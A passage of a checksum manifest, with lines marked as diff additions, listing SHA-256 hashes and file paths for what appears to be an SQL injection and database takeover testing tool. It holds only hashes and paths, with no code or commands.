+6882f232e5c02d9feb7d4447e0501e4e27be453134fb32119a228686b46492a5 doc/translations/README-ckb-KU.md +9bed1c72ffd6b25eaf0ff66ac9eefaa4efc2f5e168f51cf056b0daf3e92a3db2 doc/translations/README-de-DE.md +008c66ba4a521f7b6f05af2d28669133341a00ebc0a7b68ce0f30480581e998c doc/translations/README-es-MX.md +244cec6aee647e2447e70bbeaf848c7f95714c27e258ddbe7f68787b2be88fe9 doc/translations/README-fa-IR.md +8d31107d021f468ebbcaac7d59ad616e8d5db93a7c459039a11a6bfd2a921ce9 doc/translations/README-fr-FR.md +b9017db1f0167dda23780949b4d618baf877375dc14e08ebd6983331b945ed44 doc/translations/README-gr-GR.md +40cb977cb510b0b9b0996c6ada1bace10f28ff7c43eaab96402d7b9198320fd3 doc/translations/README-hr-HR.md +86b0f6357709e453a6380741cb05f39aa91217cf52da240d403ee8812cc4c95f doc/translations/README-id-ID.md +384bacdd547f87749ea7d73fcb01b25e4b3681d5bcf51ee1b37e9865979eb7c3 doc/translations/README-in-HI.md +21120d6671fe87c2d04e87de675f90f739a7cfe2b553db9b1b5ec31667817852 doc/translations/README-it-IT.md +0daaccf3ccb2d42ad4fbedf0c4059e8a100bb66d5f093c5912b9862bf152bbf6 doc/translations/README-ja-JP.md +81370d878567f411a80d2177d7862aa406229e6c862a6b48d922f64af0db8d14 doc/translations/README-ka-GE.md +8fb3c1b2ddb0efc9a7a1962027fa64c11c11b37eda24ea3dfca0854be73839d8 doc/translations/README-ko-KR.md +35bc7825417d83c21d19f7ebe288721c3960230a0f5b3d596be30b37e00e43c5 doc/translations/README-nl-NL.md +12d6078189d5b4bc255f41f1aae1941f1abe501abd2c0442b5a2090f1628e17d doc/translations/README-pl-PL.md +8d0708c2a215e2ee8367fe11a3af750a06bc792292cba8a204d44d03deb56b7d doc/translations/README-pt-BR.md +070cc897789e98f144a6b6b166d11289b3cda4d871273d2afe0ab81ac7ae90ad doc/translations/README-rs-RS.md +927743c0a1f68dc76969bda49b36a6146f756b907896078af2a99c3340d6cc34 doc/translations/README-ru-RU.md +65de5053b014b0e0b9ab5ab68fe545a7f9db9329fa0645a9973e457438b4fde5 doc/translations/README-sk-SK.md +43de61a9defc5eda42a6c3d746f422b43f486eacefb97862f637ab60650e9ef2 doc/translations/README-tr-TR.md 
+0db2d479b1512c948a78ce5c1cf87b5ce0b5b94e3cb16b19e9afcbed2c7f5cae doc/translations/README-uk-UA.md +82f9ec2cf2392163e694c99efa79c459a44b6213a5881887777db8228ea230fa doc/translations/README-vi-VN.md +0e8f0a2186f90fabd721072972c571a7e5664496d88d6db8aedcb1d0e34c91f0 doc/translations/README-zh-CN.md +788b845289c2fbbfc0549a2a94983f2a2468df15be5c8b5de84241a32758d70b extra/beep/beep.py +509276140d23bfc079a6863e0291c4d0077dea6942658a992cbca7904a43fae9 extra/beep/beep.wav +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 extra/beep/__init__.py +cbfa457aa0fb379a0bf90bc7e50c31aa4491043732233260d66fa0103c507d23 extra/cloak/cloak.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 extra/cloak/__init__.py +6879b01859b2003fbab79c5188fce298264cd00300f9dcecbe1ffd980fe2e128 extra/cloak/README.txt +54b1ad04bf475393edf44cdcd247f0bd61115a3a6c3e55eb01d2950c49f46e61 extra/dbgtool/dbgtool.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 extra/dbgtool/__init__.py +a777193f683475c63f0dd3916f86c4b473459640c3278ff921432836bc75c47f extra/dbgtool/README.txt +a87035e5923f5b56077dfbd18cda5aa5e2542f0707b7b55f7bbeb1960ae3cc9a extra/icmpsh/icmpsh.exe_ +2fcce0028d9dd0acfaec497599d6445832abad8e397e727967c31c834d04d598 extra/icmpsh/icmpsh-m.c +8c38efaaf8974f9d08d9a743a7403eb6ae0a57b536e0d21ccb022f2c55a16016 extra/icmpsh/icmpsh-m.pl +12014ddddc09c58ef344659c02fd1614157cfb315575378f2c8cb90843222733 extra/icmpsh/icmpsh_m.py +1589e5edeaf80590d4d0ce1fd12aa176730d5eba3bfd72a9f28d3a1a9353a9db extra/icmpsh/icmpsh-s.c +ab6ee3ee9f8600e39faecfdaa11eaa3bed6f15ccef974bb904b96bf95e980c40 extra/icmpsh/__init__.py +27af6b7ec0f689e148875cb62c3acb4399d3814ba79908220b29e354a8eed4b8 extra/icmpsh/README.txt +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 extra/__init__.py +191e3e397b83294082022de178f977f2c59fa99c96e5053375f6c16114d6777e extra/runcmd/README.txt +25be5af53911f8c4816c0c8996b5b4932543efd6be247f5e18ce936679e7d1cd extra/runcmd/runcmd.exe_ 
+70bd8a15e912f06e4ba0bd612a5f19a6b35ed0945b1e370f9b8700b120272d8f extra/runcmd/src/README.txt +084aea8f337e1aed405a581603324ec01951eadcfd7b4eefaf3000b73f8b2e1e extra/runcmd/src/runcmd/runcmd.cpp +e5c02d18abf544eebd18bd789121eaee4d638bae687402feafdd6daec18e82a1 extra/runcmd/src/runcmd/runcmd.vcproj +7c2a12c21b61f727a2b3c6e85bd098e7f8a8b585a74b5eb31eb676ac776d5d57 extra/runcmd/src/runcmd.sln +5e67c579a62715812a56731396d4cb432f16774a69f82629c6a3218174333605 extra/runcmd/src/runcmd/stdafx.cpp +7bd768f3a742dcebddbe76de26eeee1438355d8600fb19dce945eef6486a3edb extra/runcmd/src/runcmd/stdafx.h +38f59734b971d1dc200584936693296aeebef3e43e9e85d6ec3fd6427e5d6b4b extra/shellcodeexec/linux/shellcodeexec.x32_ +b8bcb53372b8c92b27580e5cc97c8aa647e156a439e2306889ef892a51593b17 extra/shellcodeexec/linux/shellcodeexec.x64_ +cfa1f8d02f815c4e8561f6adbdd4e84dda6b6af6c7a0d5eeb9d7346d07e1e7ad extra/shellcodeexec/README.txt +cb43de49a549ae5524f3066b99d6bc3b0b684c6e68c2e75602e87b2ac5718716 extra/shellcodeexec/windows/shellcodeexec.x32.exe_ +384805687bfe5b9077d90d78183afcbd4690095dfc4cc12b2ed3888f657c753c extra/shutils/autocompletion.sh +04e48ea5b4c77768e892635128ac0c9e013d61d9d5eda4f6ff8af5a09ae2500b extra/shutils/blanks.sh +b740525fa505fe58c62fd32f38fd9161004a006b5303a2e95096755801cc9b54 extra/shutils/drei.sh +2d778d7f317c23e190409cddad31709cad0b5f54393f1f35e160b4aa6b3db5a2 extra/shutils/duplicates.py +ca1a0b3601d0e73ce2df2ba6c6133e86744b71061363ba09e339951d46541120 extra/shutils/junk.sh +74fe683e94702bef6b8ea8eebb7fc47040e3ef5a03dec756e3cf4504a00c7839 extra/shutils/newlines.py +fed05c468af662ba6ca6885baf8bf85fec1e58f438b3208f3819ad730a75a803 extra/shutils/postcommit-hook.sh +ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/precommit-hook.sh +84e7288c5642f9b267e55902bc7927f45e568b643bdf66c3aedbcd52655f0885 extra/shutils/pycodestyle.sh +6b9a5b716a345f4eb6633f605fe74b5b6c4b9d5b100b41e25f167329f15a704c extra/shutils/pydiatra.sh 
+53e6915daeed6396a5977a80e16d45d65367894bb22954df52f0665cf6fe13c3 extra/shutils/pyflakes.sh +15d3e4be4a95d9142afb6b0187ca059ea71e23c3b1b08eafcc87fa61bd2bbfb8 extra/shutils/pypi.sh +df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh +1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 extra/vulnserver/__init__.py +eed1db5da17eca4c65a8f999166e2246eef84397687ae820bbe4984ef65a09df extra/vulnserver/vulnserver.py +96a39b4e3a9178e4e8285d5acd00115460cc1098ef430ab7573fc8194368da5c lib/controller/action.py +fad6640f60eac8ad1b65895cbccc39154864843a2a0b0f2ac596d3227edcd4f6 lib/controller/checks.py +34e9cf166e21ce991b61ca7695c43c892e8425f7e1228daec8cadd38f786acc6 lib/controller/controller.py +1947e6c69fbc2bdce91d2836e5c9c9535e397e9271ae4b4ef922f7a01857df5e lib/controller/handler.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 lib/controller/__init__.py +216c9399853b7454d36dcb552baf9f1169ec7942897ddc46504684325cb6ce00 lib/core/agent.py +440cbab6161f466158c63f0ee97873254655f670ca990fa26bdd0a6e54c42c2a lib/core/bigarray.py +8920eb3115ecd25933084af986f453362aa55a4bd15bfb9e75673239bd206acc lib/core/common.py +d53a8aecab8af8b8da4dc1c74d868f70a38770d34b1fa50cae4532cae7ce1c87 lib/core/compat.py +ebe518089733722879f5a13e73020ebe55d46fb7410cacf292ca4ea1d9d1c56a lib/core/convert.py +ae500647c4074681749735a4f3b17b7eca44868dd3f39f9cab0a575888ba04a1 lib/core/data.py +a051955f483b281344ae16ecc1d26f77ea915db0a77a7b62c1a5b80feb2d4d87 lib/core/datatype.py +1e4e4cb64c0102a6ef07813c5a6b6c74d50f27d1a084f47067d01e382cf32190 lib/core/decorators.py +d573a37bb00c8b65f75b275aa92549683180fb209b75fd0ff3870e3848939900 lib/core/defaults.py +1ad21a1e631f26b2ecc9c73f93218e9765de8d1a9dcc6d3c3ffe9f78ab8446d8 lib/core/dicts.py +c9d1f64648062d7962caf02c4e2e7d84e8feb2a14451146f627112aae889afcd lib/core/dump.py 
+9187819a6fd55f4b9a64c6df1a9b4094718d453906fc6eeda541c8880b3b62c4 lib/core/enums.py +00a9b29caa81fe4a5ef145202f9c92e6081f90b2a85cd76c878d520d900ad856 lib/core/exception.py +629c0d06d4f4d093badfc8d1de49432d058f66f3223b08dded012eaf05719de2 lib/core/gui.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 lib/core/__init__.py +3d308440fb01d04b5d363bfbe0f337756b098532e5bb7a1c91d5213157ec2c35 lib/core/log.py +2a06dc9b5c17a1efdcdb903545729809399f1ee96f7352cc19b9aaa227394ff3 lib/core/optiondict.py +16a8a7be0d34a2ba77690375c03a5d2c905b752ab3f080c39fdce5f69c3df8ce lib/core/option.py +866e93c93541498ecce70125037bdd376d78188e481d225f81843f21f4797d8c lib/core/patch.py +85f10c6195a3a675892d914328173a6fb6a8393120417a2f10071c6e77bfa47d lib/core/profiling.py +c4bfb493a03caf84dd362aec7c248097841de804b7413d0e1ecb8a90c8550bc0 lib/core/readlineng.py +d1bd70c1a55858495c727fbec91e30af267459c8f64d50fabf9e4ee2c007e920 lib/core/replication.py +1d0f80b0193ac5204527bfab4bde1a7aee0f693fd008e86b4b29f606d1ef94f3 lib/core/revision.py +d2eb8e4b05ac93551272b3d4abfaf5b9f2d3ac92499a7704c16ed0b4f200db38 lib/core/session.py +a5b7e56553e02ad012bba892d6d0ef8e927b8f94436c7df87b0371920e41e4d7 lib/core/settings.py +1c5eab9494eb969bc9ce118a2ea6954690c6851cbe54c18373c723b99734bf09 lib/core/shell.py +4eea6dcf023e41e3c64b210cb5c2efc7ca893b727f5e49d9c924f076bb224053 lib/core/subprocessng.py +cdd352e1331c6b535e780f6edea79465cb55af53aa2114dcea0e8bf382e56d1a lib/core/target.py +6cf11d8b00fa761046686437fe90565e708809f793e88a3f02527d0e49c4d2a8 lib/core/testing.py +1ba2ba8d39c5f655f45c7454b22870f1884ae7aa36e401e3df1a9ed4de691e3d lib/core/threads.py +6f61e7946e368ee1450c301aaf5a26381a8ae31fc8bffa28afc9383e8b1fbc3f lib/core/unescaper.py +f7245b99c17ef88cd9a626ca09c0882a5e172bb10a38a5dec9d08da6c8e2d076 lib/core/update.py +cba481f8c79f4a75bd147b9eb5a1e6e61d70422fceadd12494b1dbaa4f1d27f4 lib/core/wordlist.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 lib/__init__.py 
+7d1d3e07a1f088428d155c0e1b28e67ecbf5f62775bdeeeb11b4388369dce0f7 lib/parse/banner.py +e49fb4fea83c305ebdbb8008c26118063da2134bdefe05f73dee90532c6d0dd3 lib/parse/cmdline.py +f1ad73b6368730b8b8bc2e28b3305445d2b954041717619bede421ccc4381625 lib/parse/configfile.py +a96b7093f30b3bf774f5cc7a622867472d64a2ae8b374b43786d155cf6203093 lib/parse/handler.py +cfd4857ce17e0a2da312c18dcff28aefaa411f419b4e383b202601c42de40eec lib/parse/headers.py +5e71ff2196eac73e695c4e95d2db9ed98ac34070688a8bfdea711e61808b6b3a lib/parse/html.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 lib/parse/__init__.py +8baab6407b129985bf0acbea17c6a02d3a1b33b81fc646ce6c780d77fe2cc854 lib/parse/payloads.py +d7082e4a5937f65cbb4862701bad7d4fbc096a826621ba7eab92e52e48ebd6d7 lib/parse/sitemap.py +0f52f3c1d1f1322a91c98955bd8dc3be80964d8b3421d453a0e73a523c9cfcbf lib/request/basicauthhandler.py +18cb22d4dabdcc8e3381baf66edd52e74ad2d2067d0116e134a94ffc950c054e lib/request/basic.py +fdb4a9f2ca9d01480c3eb115f6fdf8d89f8ff0506c56a223421b395481527670 lib/request/chunkedhandler.py +bb8a06257d170b268c66dcbd3c0fbe013de52eed1e63bb68caa112af5b9f8ca9 lib/request/comparison.py +26fda3422995eae2e02313c016d8a5e0dc8235e7406fe094ebdb149742859b0e lib/request/connect.py +a890be5dee3fb4f5cb8b5f35984017a5c172d587722cf0c690bf50e338deebfa lib/request/direct.py +a53fa3513431330ce1725a90e7e3d20f223e14605d699e1f66b41625f04439c7 lib/request/dns.py +685b3e9855c65af3f4516b4cac1d2591bd9d653246d02b08bffa94b706115fa9 lib/request/httpshandler.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 lib/request/__init__.py +fcab35db1da4ac11d8c5b8291f9c87b8d7bb073c460c438374bc5a71ce5c65a6 lib/request/inject.py +03490bed87a54bf6c42a33ac1a66f7f8504c2398534a211e7e9306f408cd506a lib/request/methodrequest.py +eba8b1638c0c19d497dcbab86c9508b2ce870551b16a40db752a13c697d7d267 lib/request/pkihandler.py +6336a6aba124905dab3e5ff67f76cf9b735c2a2879cc3bc8951cb06bea125895 lib/request/rangehandler.py 
+14b402c3a927b7fb251622c9f4faf507993e033bd3b1cc281fe2873b9a382a51 lib/request/redirecthandler.py +3157d66bb021b71b2e71e355b209578d15f83000f0655bcf0cd7c7eed5d4669b lib/request/templates.py +96f38f1b99648e72f99e419b2119f380635fca42a2a8854625b7ccc630f484a7 lib/takeover/abstraction.py +250782249ee5afbcf3f398c596edbc3a9a1b35b3e11ac182678f6e22c1449852 lib/takeover/icmpsh.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 lib/takeover/__init__.py +24f4f85dad38b4641bd70c8c9a2e5221531a37fdd27e04731176c03b5b1784f5 lib/takeover/metasploit.py +0e3b9aa28fe945d0c99613f601b866ae37e7079fe5cc99e0ee5bd389f46e3767 lib/takeover/registry.py +479cf4a9c0733ba62bfa764e465a59277d21661647304fa10f6f80bf6ecc518b lib/takeover/udf.py +08270a96d51339f628683bce58ee53c209d3c88a64be39444be5e2f9d98c0944 lib/takeover/web.py +d40d5d1596d975b4ff258a70ad084accfcf445421b08dcf010d36986895e56cb lib/takeover/xp_cmdshell.py +9b3ccafc39f24000a148484a005226b8ba5ac142f141a8bd52160dfc56941538 lib/techniques/blind/inference.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 lib/techniques/blind/__init__.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 lib/techniques/dns/__init__.py +d20798551d141b3eb0b1c789ee595f776386469ac3f9aeee612fd7a5607b98cd lib/techniques/dns/test.py +1c001f02aa664f9c888886a7183234a7367f1d25df02a28476401aac3569365d lib/techniques/dns/use.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 lib/techniques/error/__init__.py +6be9c18cec3f9dd5c6d8cc40bab9cb0b961b03604546b258eb9aa3156ad24679 lib/techniques/error/use.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 lib/techniques/__init__.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 lib/techniques/union/__init__.py +dca6a14d7e30f8d320cc972620402798b493528a0ad7bd98a7f38327cea04e20 lib/techniques/union/test.py +4a866eefe165a541218eb71926a49f65ac13505b88857624b3759970c5069451 lib/techniques/union/use.py 
+e41d96b1520e30bd4ce13adfcf52e11d3a5ea75c0b2d7612958d0054be889763 lib/utils/api.py +af67d25e8c16b429a5b471d3c629dc1da262262320bf7cd68465d151c02def16 lib/utils/brute.py +828940a8eefda29c9eb271c21f29e2c4d1d428ccf0dcc6380e7ee6740300ec55 lib/utils/crawler.py +bfb4ea118e881d60c42552d883940ca5cca4e2a406686a2836e0739ed863a6a4 lib/utils/deps.py +3aca7632d53ab2569ddef876a1b90f244640a53e19b304c77745f8ddb15e6437 lib/utils/getch.py +e67aa754b7eeb6ec233c27f7d515e10b6607448056a1daba577936d765551636 lib/utils/har.py +00135cf61f1cfe79d7be14c526f84a841ad22e736db04e4fe087baeb4c22dc0d lib/utils/hashdb.py +acf5b98e409f1d1de8f104b994f97b7ad57768e5651898aa6754102563a25809 lib/utils/hash.py +ba862f0c96b1d39797fb21974599e09690d312b17a85e6639bee9d1db510f543 lib/utils/httpd.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 lib/utils/__init__.py +f1d84b1b99ce64c1ccb64aaa35f5231cf094b3dac739f29f76843f23ee10b990 lib/utils/pivotdumptable.py +d0643f8fa5ea2991cda35817154f692f1948910e4506cb56827d87bc0b5540b7 lib/utils/progress.py +e0bf9d7c069bc6b1ba45e1ddeb1eb94dac14676a1474a05c9af4dcbd9e89cc74 lib/utils/purge.py +51be814d061dcaf32a98fb87c678bb84682b02b322d1e781ab643b55f74a6fc8 lib/utils/safe2bin.py +c0e6e33d2aa115e7ab2459e099cbaeb282065ea158943efc2ff69ba771f03210 lib/utils/search.py +8258d0f54ad94e6101934971af4e55d5540f217c40ddcc594e2fba837b856d35 lib/utils/sgmllib.py +61dfd44fb0a5a308ba225092cb2768491ea2393999683545b7a9c4f190001ab8 lib/utils/sqlalchemy.py +6f5f4b921f8cfe625e4656ee4560bc7d699d1aebf6225e9a8f5cf969d0fa7896 lib/utils/timeout.py +04f8a2419681876d507b66553797701f1f7a56b71b5221fa317ed56b789dedb3 lib/utils/versioncheck.py +bd4975ff9cbc0745d341e6c884e6a11b07b0a414105cc899e950686d2c1f88ba lib/utils/xrange.py +33049ba7ddaea4a8a83346b3be29d5afce52bbe0b9d8640072d45cadc0e6d4bb LICENSE +4533aeb5b4fefb5db485a5976102b0449cc712a82d44f9630cf86150a7b3df55 plugins/dbms/access/connector.py +acd26b5dd9dfc0fb83c650c88a02184a0f673b1698520c15cd4ce5c29a10ea5e 
plugins/dbms/access/enumeration.py +6ae41f03920129ada7c24658673ffb3c1ce9c4d893a310b0fcdd069782d89495 plugins/dbms/access/filesystem.py +9cf2047f6545670bc8d504bcc06a76e0d9eca2453cafd2b071d3d11baaca694e plugins/dbms/access/fingerprint.py +4ee0497890c6830113e36db873c97048f9aa157110029bb888ae59b949a4caf2 plugins/dbms/access/__init__.py +9be52ff94cdecad994f83c2b7fbeb8178d77f081928e1720d82cddb524d256c6 plugins/dbms/access/syntax.py +1e2a87087dbb9f5b9e8690c283abde4c76da3285200914009187d0a957aa33b9 plugins/dbms/access/takeover.py +4b971c05cf9d741933bfd012f090daef49843c9daa2ef2a3a8a24d07fad3f9ff plugins/dbms/altibase/connector.py +e22adea1301ab433446d0a3eb6b3a2da684100860256e80150c0b860493cc5b2 plugins/dbms/altibase/enumeration.py +15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/altibase/filesystem.py +773081f8609d955b15346f8b5d7284b440e562bac87c4a33b125bdbac4041dce plugins/dbms/altibase/fingerprint.py +27d753172d8d62fa99bbbd3927f41d1f8afda4c1060fd9f449c9d8583bf0bbc8 plugins/dbms/altibase/__init__.py +3d69cd5d416090ef9fbdcfa7e563721e1575e4bef03a4ee45e17e6bd14deb449 plugins/dbms/altibase/syntax.py +ff70187b10550630b903f59269f86ea7b74aa41c33ec1fcb62272a1adc55c1c9 plugins/dbms/altibase/takeover.py +28574b0841e99f16cc5ba684a2e72b7ceb3df70fa6ac4c2eab04239a59943516 plugins/dbms/cache/connector.py +586403dc323d4560d7f46a71c9889f91c7bb6765367654a5e9d1f12ce6eed132 plugins/dbms/cache/enumeration.py +15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/cache/filesystem.py +c6c66a4daec20e30a6e4b647e149693b7a2f2d0196df6d9995263cc1bf77d01a plugins/dbms/cache/fingerprint.py +b9c2af04ef96cdea693dc40505a917173d6e87fbf54e31cb80b68700e2fcd98b plugins/dbms/cache/__init__.py +152e5751ae83f92850ed6e100b0168478773e6a638b84f0117eca07c80c3de7f plugins/dbms/cache/syntax.py +185c4af214e7ab756dc40ca47ad519b4e8c98ad944a775b6a7dedb5c62262b61 plugins/dbms/cache/takeover.py +52448c7dd5e95291cf9b89ab3b574d46a36c8bf24b4d1a8e978d043e8d89d000 
plugins/dbms/clickhouse/connector.py +c0f2622a8aabf630ad486cd4f83909c1f8e807f4bf5ec533a4af1bfe74fb1c28 plugins/dbms/clickhouse/enumeration.py +06f808b2bcd5469ea962e24ba0cf986527c7ab3e1aa35ef2390d0e62e82ff2b0 plugins/dbms/clickhouse/filesystem.py +6651471640bec9e2230bac67aeeb13f5329072c9ff3eb6965f1f44d3c82a2964 plugins/dbms/clickhouse/fingerprint.py +aae6a36ac07bc3e9d5b416f4fc6b26ecb7b9de749d1999787d19ced37b8a7440 plugins/dbms/clickhouse/__init__.py +aba0f1bdffc77cf64eff26747b6736e18f7dba4c7835c1d55d20ecdc9cf11de6 plugins/dbms/clickhouse/syntax.py +7887a09e81c0a1d815a3bee946b0a1285b929bc2ffaadd985b0cb487165b4c8d plugins/dbms/clickhouse/takeover.py +9ca6fccb27cac0037103db6f05b561039c9f6bd280ab2fb87b76e4d52142c335 plugins/dbms/cratedb/connector.py +ed2c22fc575cdbc1b20241b5699efc7d90828b169dabf4779b678482121a6d31 plugins/dbms/cratedb/enumeration.py +15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/cratedb/filesystem.py +ef7eecfd3cca7891e7eaa6e15e92166bcc3fff05a52546b899ebf1eb4e850b8b plugins/dbms/cratedb/fingerprint.py +069a1b7b6825b1fe1cb4a7308f46e704eb66d212556c4a93e4b32576a53b5710 plugins/dbms/cratedb/__init__.py +71fe10362af9eb1e479c082c24edb49d97aeaf1469f0edfffe408ed91f6b4f9e plugins/dbms/cratedb/syntax.py +9defe46e7e3859e8a58d26afc1964f74ab81b8158ad2be8817b11abb25dd55ad plugins/dbms/cratedb/takeover.py +3ab24a5d28021f1bce400811ccc1788d01647387c714a11e43f8fa421805d7b1 plugins/dbms/cubrid/connector.py +a463c8759d5df45dc5c30196e060f5e13560fe298e2028a2ad2b46e265e9b7d4 plugins/dbms/cubrid/enumeration.py +15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/cubrid/filesystem.py +110d5b883c65d101850e6a5d60a97f35717c8dd9497f0cf50689266bd281d956 plugins/dbms/cubrid/fingerprint.py +469c61617884349128219c270f975b62bede023b4032f36a79e1cf963c147b56 plugins/dbms/cubrid/__init__.py +2c5ac6eb7f565caafaac5d02bf7334a942d702e444c66d11eadf6556a0ffd718 plugins/dbms/cubrid/syntax.py 
+0bdfd0c7a4e7fa9b44ba7d61c5467cb67dcb156417a34e981b264de8ce5e1d55 plugins/dbms/cubrid/takeover.py +72663e8e920b8f3d26ec45b1071a09168ab01534a976e5afd809a81892218687 plugins/dbms/db2/connector.py +d2b140c2bccb56d2e53864f296e9a0d222d497a98faee7f8f2bc720f70630ea0 plugins/dbms/db2/enumeration.py +15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/db2/filesystem.py +ecba1c2f37301957cb05df2f8e35fd3b149eac8f555655af2cc56d8bc0a625d2 plugins/dbms/db2/fingerprint.py +14f1e5b39a5edd9b48f64f9e498b2487bd8de5354188716f228819e365a0f932 plugins/dbms/db2/__init__.py +3d69cd5d416090ef9fbdcfa7e563721e1575e4bef03a4ee45e17e6bd14deb449 plugins/dbms/db2/syntax.py +874ad3a363f415a9b5b705cb2ec2d76872036ba678bbff5033da6bc1568caff4 plugins/dbms/db2/takeover.py +67cc525c8aba7200c01f6ae36f26cee7eaa01c0e4cc2c4416a0e59fab595c01a plugins/dbms/derby/connector.py +a70d01e72a6995d2bca0f72b696b69105791164b03784224ce81d22da0472116 plugins/dbms/derby/enumeration.py +15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/derby/filesystem.py +6fcb1878c57e1556b56efd3a665e393d5ce3eb5f427b13050ae2cb51ad64ffb2 plugins/dbms/derby/fingerprint.py +31c2a2bcf41568d9f5b5911cf81a2ffbe2c1489c1d0ef7f1e3dd87f0f271c85d plugins/dbms/derby/__init__.py +71fe10362af9eb1e479c082c24edb49d97aeaf1469f0edfffe408ed91f6b4f9e plugins/dbms/derby/syntax.py +d46e36b7d9ddafed9fd9e1190ec5af8f8287293d3d08e0ab352ecfbf231af7bb plugins/dbms/derby/takeover.py +0be4f17fc009c1d58fb1dbc0ef087d68bef007dd0daaea87e5a6dbda7f385558 plugins/dbms/extremedb/connector.py +e4e0d604af688794eeb4f81ab796f6fdc103af7de0498993f6424e3fce95875c plugins/dbms/extremedb/enumeration.py +b1d790a0eeebaeb78820094787458adb676ea519ae38152599f07c859b0d2a2b plugins/dbms/extremedb/filesystem.py +f75474af2a08c98b26a8eb360c244268766647a69b819c662d7077b4479bc3d4 plugins/dbms/extremedb/fingerprint.py +f2be0dd78572d6ed26130805974c8663c80e89c3da64c30fe76aad2779a3ef77 plugins/dbms/extremedb/__init__.py 
+71fe10362af9eb1e479c082c24edb49d97aeaf1469f0edfffe408ed91f6b4f9e plugins/dbms/extremedb/syntax.py +649c6a04e83b55857c8c98a209b4d40121e9169671b258dfbd4ae6ce993c496f plugins/dbms/extremedb/takeover.py +e3e66c6fd340cc0887a3582e4e6c73a703f5260d0a8dafdb3fe09e8ace787474 plugins/dbms/firebird/connector.py +29310d973f238c2d9599ed184122bbaedb4bfa9030f2fe5f37966e946b6053d1 plugins/dbms/firebird/enumeration.py +797ecc06bad81e6915f838e14246cbf266f77e500dbc8dedb6fbbcff4ac15074 plugins/dbms/firebird/filesystem.py +75ddf9cb76fdc9a2f4acaa1bd66e5b7218ed1e005cca8b6d20395344e6ade8e4 plugins/dbms/firebird/fingerprint.py +c0571bba933fac6cbb925ed14bf694ccd3da57c8aed97fa46e262f45e7880c6d plugins/dbms/firebird/__init__.py +a9a0eba443a0085b94fe7e5b7339fa8346acdeb1cd117d153446eb15e1d6ca7d plugins/dbms/firebird/syntax.py +d19649cbd5555a936e09c5209742541d96a3647787d51ea13bdce765a6198e64 plugins/dbms/firebird/takeover.py +d5994d9cd22c4761f995a6b4a7d97757270e8c13467367a47de4d27dbc68057f plugins/dbms/frontbase/connector.py +d7fb18ae7475d1dd75c09dc3f53d2aea4bd9c7b113b8a1c030d3a510177f113f plugins/dbms/frontbase/enumeration.py +2e10646b916129a14b0b959a86a072eb41a6b57995fb0ade286eb565c9b09366 plugins/dbms/frontbase/filesystem.py +7b4420db7796610c0fe3851edfa697dc59e715edb394b1fecb6f1e6e10dd29f7 plugins/dbms/frontbase/fingerprint.py +97c006d99f6d34a320a4348e9cf8a992917ee6f325272049d753956409d3cdac plugins/dbms/frontbase/__init__.py +71fe10362af9eb1e479c082c24edb49d97aeaf1469f0edfffe408ed91f6b4f9e plugins/dbms/frontbase/syntax.py +fd9d9030d054b9b74cf6973902ca38b0a6cad5898b828366162df6bdc8ea10d2 plugins/dbms/frontbase/takeover.py +ed39a02193934768cf65d86f9424005f60e0ef03052b5fea1103c78818c19d45 plugins/dbms/h2/connector.py +8556f37d4739f8eafcde253b2053d1af41959f6ec09af531304d0e695e3eed6b plugins/dbms/h2/enumeration.py +080b0c1173ffe7511dc6990b6de8385b5e63a5c19b8d5e2d04de23ac9513a45c plugins/dbms/h2/filesystem.py +d08c1a912f8334c3e706b598db2869edbb1a291a2ccb00c9523ee371de9db0d0 
